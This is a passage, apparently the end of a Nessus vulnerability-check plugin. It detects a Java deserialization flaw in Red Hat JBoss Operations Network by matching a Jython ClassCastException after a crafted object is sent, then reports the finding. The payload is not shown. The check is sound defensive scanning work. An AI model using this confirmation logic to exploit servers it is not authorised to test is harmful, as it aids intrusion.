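if (isnull(resp) || len(resp) != 3) audit(AUDIT_RESP_BAD, port);

# Success indicator: the gadget chain was deserialized and the server then
# failed to cast the Jython None (PySingleton) returned by the PyFunction.
# A missing or different body is taken as not vulnerable. NOTE(review): a
# proxy/WAF that rewrites error bodies would cause a false negative here.
vuln_marker = "java.lang.ClassCastException: org.python.core.PySingleton cannot be cast to";
if (isnull(resp[2]) || vuln_marker >!< resp[2])
  audit(AUDIT_INST_VER_NOT_VULN, appname, install["version"]);

# Include the target URL and the matched exception so the finding can be
# verified by hand; the mitigation (agent authentication) is in the solution.
report =
  '\nNessus was able to exploit a Java deserialization vulnerability by' +
  '\nsending a crafted Java object to the following URL :' +
  '\n' +
  '\n  ' + build_url(qs:path, port:port) +
  '\n' +
  '\nThe server responded with :' +
  '\n' +
  '\n  ' + vuln_marker + ' ...' +
  '\n';
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);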
Vendor | Product | Version | CPE
redhat | jboss_operations_network | — | cpe:/a:redhat:jboss_operations_network

